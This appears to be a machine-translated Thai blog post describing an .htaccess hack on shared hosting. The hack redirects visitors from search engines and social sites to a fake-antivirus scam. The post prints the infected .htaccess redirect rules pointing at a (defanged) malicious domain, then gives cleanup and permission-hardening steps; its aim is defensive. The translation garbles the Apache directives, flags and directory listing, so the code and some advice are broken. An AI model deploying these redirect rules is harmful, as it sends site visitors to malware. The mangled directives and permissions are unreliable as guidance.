ไวรัสรูปแบบใหม่ ซึ่งฉันเห็นว่าไม่ค่อยมีใครรู้ แต่ส่งผลต่อไซต์ที่โฮสต์อยู่ เซิร์ฟเวอร์ที่ไม่น่าเชื่อถือ โดยที่บัญชีผู้ใช้ / บัญชีโดเมนย่อยสามารถทำได้ “ดู” ระหว่างพวกเขา แม่นยำยิ่งขึ้น บัญชีโฮสติ้งทั้งหมดจะอยู่ในโฟลเดอร์ “วีโฮสต์“และลิขสิทธิ์ของ โฟลเดอร์ผู้ใช้ จาก “วีโฮสต์” มอบให้กับผู้ใช้ทั่วไป… ตัวแทนจำหน่ายในสถานการณ์ส่วนใหญ่ เป็นวิธีการทั่วไปของเว็บเซิร์ฟเวอร์ที่ไม่ได้ใช้ WHM/cPanel-
เนื้อหา
การกระทำของไวรัส .htaccess – .htaccess แฮ็ค
ไวรัส ส่งผลกระทบต่อไฟล์ .htaccess ของสถานที่ตกเป็นเหยื่อ มีการเพิ่มบรรทัด / คำสั่ง ซึ่งจะ เปลี่ยนเส้นทางผู้เยี่ยมชม (มาจาก yahoo, msn, google, facebook, yaindex, twitter, myspace ฯลฯ ไซต์และพอร์ทัลที่มีการเข้าชมสูง) ไปยังบางไซต์ที่นำเสนอ “โซลูชั่นป้องกันไวรัส“- มันเกี่ยวกับ โซลูชั่นป้องกันไวรัสปลอมที่ฉันเขียนไว้ในคำนำจาก เครื่องมือกำจัดไวรัสปลอม-
นี่คือสิ่งที่ดูเหมือน .htaccess ได้รับผลกระทบ: (อย่าเข้าถึง URL ในเนื้อหาของบรรทัดด้านล่าง-
ErrorDocument 500 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&อี=0
ErrorDocument 502 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&อี=2
ErrorDocument 403 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&อี=3เขียนโปรแกรมใหม่อีกครั้ง
เขียนใหม่ %{HTTP_REFERER} .*yandex.*$ [NC,OR]
เขียนใหม่ %{HTTP_REFERER} .*odnoklassniki.*$ [NC,OR]
เขียนใหม่ %{HTTP_REFERER} .*vkontakte.*$ [NC,OR]
เขียนใหม่ %{HTTP_REFERER} .*rambler.*$ [NC,OR]
เขียนใหม่ %{HTTP_REFERER} .*tube.*$ [NC,OR]
เขียนใหม่ %{http_referer} .*wikipedia.*$ [nc หรือ]
RewriteCond %{HTTP_REFERER} .*blogger.*$ [NC,OR]
เขียนใหม่ %{HTTP_REFERER} .*baidu.*$ [NC,OR]
เขียนใหม่ %{HTTP_REFERER} .*qq.com.*$ [NC,OR]
เขียนใหม่ %{HTTP_REFERER} .*myspace.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*twitter.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*facebook.*$ [NC,OR]
เขียนซ้ำ %{HTTP_REFERER} .*google.*$ [NC,OR]
เขียนใหม่ %{HTTP_REFERER} .*live.*$ [NC,OR]
เขียนใหม่ %{HTTP_REFERER} .*aol.*$ [NC,OR]
เขียนใหม่ %{HTTP_REFERER} .*bing.*$ [NC,OR]
เขียนใหม่ %{HTTP_REFERER} .*msn.*$ [NC,OR]
เขียนใหม่ %{HTTP_REFERER} .*amazon.*$ [NC,OR]
เขียนใหม่ %{HTTP_REFERER} .*ebay.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*linkedin.*$ [NC,OR]
เขียนใหม่ %{HTTP_REFERER} .*flickr.*$ [NC,OR]
เขียนใหม่ %{HTTP_REFERER} .*livejasmin.*$ [NC,OR]
เขียนใหม่ %{HTTP_REFERER} .*soso.*$ [NC,OR]
เขียนใหม่ %{HTTP_REFERER} .*doubleclick.*$ [NC,OR]
เขียนใหม่ %{HTTP_REFERER} .*pornhub.*$ [NC,OR]
เขียนใหม่ %{HTTP_REFERER} .*orkut.*$ [NC,OR]
เขียนใหม่ %{HTTP_REFERER} .*livejournal.*$ [NC,OR]
เขียนใหม่ %{HTTP_REFERER} .*wordpress.*$ [NC,OR]
เขียนใหม่ %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
เขียนซ้ำ %{HTTP_REFERER} .*ask.*$ [NC,OR]
เขียนใหม่ %{HTTP_REFERER} .*ตื่นเต้น*$ [NC,OR]
เขียนใหม่ %{HTTP_REFERER} .*altavista.*$ [NC,OR]
เขียนใหม่ %{HTTP_REFERER} .*msn.*$ [NC,OR]
เขียนใหม่ %{HTTP_REFERER} .*netscape.*$ [NC,OR]
เขียนใหม่ %{HTTP_REFERER} .*hotbot.*$ [NC,OR]
เขียนใหม่ %{HTTP_REFERER} .*goto.*$ [NC,OR]
เขียนใหม่ %{HTTP_REFERER} .*infoseek.*$ [NC,OR]
เขียนใหม่ %{HTTP_REFERER} .*mamma.*$ [NC,OR]
เขียนใหม่ %{HTTP_REFERER} .*alltheweb.*$ [NC,OR]
เขียนใหม่ %{HTTP_REFERER} .*lycos.*$ [NC,OR]
เขียนใหม่ %{HTTP_REFERER} .*search.*$ [NC,OR]
เขียนใหม่ %{HTTP_REFERER} .*metacrawler.*$ [NC,OR]
เขียนซ้ำ %{HTTP_REFERER} .*mail.*$ [NC,OR]
เขียนใหม่ %{HTTP_REFERER} .*dogpile.*$ [NC]เขียนใหม่ %{HTTP_USER_AGENT} .*Windows.*
RewriteRule .* hxxp://wwww.peoriavascularsurgery.com/main.php?h=%{HTTP_HOST}&i=J8iiidsar/qmiRj7V8NOyJoXpA==&อี=อาร์ [R,L]เขียนใหม่ %{REQUEST_FILENAME} !-f
เขียนใหม่ %{REQUEST_FILENAME} !-d
เขียนใหม่ %{REQUEST_FILENAME} !.*jpg$|.*gif$|.*png$
เขียนใหม่ %{HTTP_USER_AGENT} .*Windows.*
RewriteRule .* hxxp://wwww.peoriavascularsurgery.com/main.php?h=%{HTTP_HOST}&i=J8iiidsar/qmiRj7V8NOyJoXpA==&อี=4 [ร,ล]
ผู้ที่ใช้ WordPress จะพบบรรทัดเหล่านี้ในไฟล์ .htaccess จาก public_html- นอกจากนี้ไวรัสยังสร้าง .htaccess ที่เหมือนกันในโฟลเดอร์อีกด้วย wp-เนื้อหา-
-นอกจากนี้ยังมีสถานการณ์ที่แทนที่จะปรากฏ peoriavascularsurgery.com dns.thesoulfoodcafe.com หรือที่อยู่อื่นๆ
ไวรัสตัวนี้ทำอะไร?
เมื่อเปลี่ยนเส้นทางแล้ว ผู้เยี่ยมชมจะได้รับการต้อนรับด้วยข้อความ:
คำเตือน!
คอมพิวเตอร์ของคุณมีสัญญาณต่างๆ ของไวรัสและโปรแกรมมัลแวร์ ระบบของคุณต้องการการตรวจสอบการป้องกันไวรัสทันที!
ความปลอดภัยของระบบจะทำการสแกนพีซีของคุณอย่างรวดเร็วและฟรีเพื่อหาไวรัสและโปรแกรมที่เป็นอันตราย
ไม่ว่าเราจะกดปุ่มไหนเราก็จะพาไปที่หน้าของ “คอมพิวเตอร์ของฉัน“สร้างขึ้นเพื่อเลียนแบบ การออกแบบ XP- ที่นี่มันเริ่มต้นโดยอัตโนมัติ “กระบวนการสแกน”ในตอนท้ายเราก็ค้นพบสิ่งนั้น “เราติดเชื้อแล้ว”-
หลังจากกด OK หรือ Cancel มันก็จะเริ่มทำงาน การดาวน์โหลดของไฟล์ setup.exe- นี้ setup.exe เป็นแอนตี้ไวรัสปลอม ซึ่งส่งผลต่อระบบ โดยจะติดตั้งชุดแอปพลิเคชันมัลแวร์ที่จะเผยแพร่ลิงก์ที่ติดไวรัสเพิ่มเติม และนอกเหนือจากนี้ ซอฟต์แวร์ป้องกันไวรัส (ของปลอมด้วย) ซึ่งเหยื่อได้รับเชิญให้ซื้อ
ผู้ที่เคยติดต่อไวรัสรูปแบบนี้แล้วสามารถใช้งานได้ เครื่องมือกำจัดไวรัสปลอม- ขอแนะนำให้สแกน HDD ทั้งหมดด้วย แนะนำ ความปลอดภัยทางอินเทอร์เน็ตของ Kaspersky หรือ แคสเปอร์สกี้ แอนตี้ไวรัส-
ไวรัสรูปแบบนี้ส่งผลกระทบต่อระบบปฏิบัติการของผู้เยี่ยมชมที่มีระบบปฏิบัติการ วินโดว์ XP, วินโดว์ ME, วินโดว์ 2000, วินโดว์ NT, วินโดว์ 98 และ Windows 95 จนถึงขณะนี้ ยังไม่มีกรณีการติดไวรัสในระบบปฏิบัติการ Windows Vista และ Windows 7
เราจะลบไวรัส .htaccess นี้ออกจากเซิร์ฟเวอร์ได้อย่างไร และเราจะป้องกันการติดไวรัสได้อย่างไร
1. การวิเคราะห์ไฟล์และการลบรหัสที่น่าสงสัย เพื่อให้แน่ใจว่าไม่เพียงแค่ไฟล์เท่านั้นที่ได้รับผลกระทบ .htaccess มันเป็นเรื่องดีที่จะ เราวิเคราะห์ไฟล์ทั้งหมด .php และ .js-
2. เราเขียนไฟล์ .htaccess ใหม่และตั้งค่า ชโมด 644 หรือ 744 มีสิทธิ์ในการเขียนเท่านั้น ผู้ใช้-ul เจ้าของ-
3. เมื่อสร้างบัญชีโฮสติ้งสำหรับไซต์ในโฟลเดอร์ /บ้าน หรือ /webroot โฟลเดอร์จะถูกสร้างขึ้นโดยอัตโนมัติซึ่งโดยปกติจะมีชื่อผู้ใช้ (ผู้ใช้ cpanel, ftpฯลฯ) เพื่อป้องกันการเขียนข้อมูลและการส่งไวรัสจากผู้ใช้รายหนึ่งไปยังอีกรายหนึ่ง ขอแนะนำให้ตั้งค่าในแต่ละโฟลเดอร์ผู้ใช้:
Chmod 644 หรือ 744, 755 – ระบุเป็น 644
chown -R nume_user nume_folder
chgrp -R nume_user nume_folder
ls -ทั้งหมด เพื่อตรวจสอบว่าโหมดได้รับการตั้งค่าอย่างถูกต้องหรือไม่ สิ่งนี้ควรปรากฏขึ้น:
drwx–x–x 12 dinamics dinamics 4096 6 พฤษภาคม 14:51 dinamics/
drwx–x–x 10 duran duran 4096 7 มี.ค. 07:46 duran/
drwx–x–x หลอดทดลอง 12 หลอด หลอดทดลอง 4096 29 ม.ค. 11:23 หลอดทดลอง/
drwxr-xr-x 14 ด่วน ด่วน 4096 26 ก.พ. 2552 ด่วน/
drwxr-xr-x 9 เหล่านั้น 4096 19 พฤษภาคม 01:09 เหล่านั้น/
drwx–x–x 9 ฟาร์ม ฟาร์ม 4096 ธ.ค. 62 22:29 ฟาร์ม/
หากผู้ใช้รายใดรายหนึ่งข้างต้นจะมี FTP ไฟล์ที่ติดไวรัสก็จะไม่สามารถส่งไวรัสไปยังผู้ใช้โฮสต์รายอื่นได้ เป็นมาตรการรักษาความปลอดภัยขั้นต่ำในการปกป้องบัญชีที่โฮสต์บนเว็บเซิร์ฟเวอร์
องค์ประกอบทั่วไปของโดเมนที่ได้รับผลกระทบจากไวรัสประเภทนี้
โดเมนที่ได้รับผลกระทบทั้งหมดเปลี่ยนเส้นทางผู้เยี่ยมชมไปยังไซต์ที่มีชื่อโดเมน “-main.php?e=4&ชม.“-
นี้ “ไวรัส .htaccess” ส่งผลต่อ CMS ทุกประเภท (จูมล่า, เวิร์ดเพรส, phpBBฯลฯ) ที่ใช้ .htaccess-
.htaccess แฮ็กไวรัส & เปลี่ยนเส้นทาง-
